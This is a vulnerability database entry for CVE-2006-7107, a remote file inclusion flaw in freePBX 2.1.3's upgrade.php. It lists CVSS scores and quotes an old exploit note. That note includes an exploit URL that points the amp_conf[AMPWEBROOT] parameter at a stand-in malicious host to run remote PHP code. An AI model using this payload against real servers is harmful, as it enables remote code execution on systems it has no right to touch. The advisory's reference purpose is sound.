7.5
CVSSv2

CVE-2006-7107

Published: 03/03/2007 Updated: 11/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in upgrade.php in Coalescent Systems freePBX 2.1.3 allows remote malicious users to execute arbitrary PHP code via a URL in the amp_conf[AMPWEBROOT] parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

coalescent systems freepbx 2.1.3

Exploits

Script: freePBX Version: v213 Script Download: puzzledlsourceforgenet/sourceforge/amportal/freepbx-213tgz Code: require_once($amp_conf["AMPWEBROOT"] "/admin/functionsincphp"); Exploit: upgrades/21beta1/upgradephp?amp_conf[AMPWEBROOT]=evilscripts? Found: Cyber-Security Thanks: DJR, xoron, K@OS, trampfd, Konaksinamon, KripteX, sa ...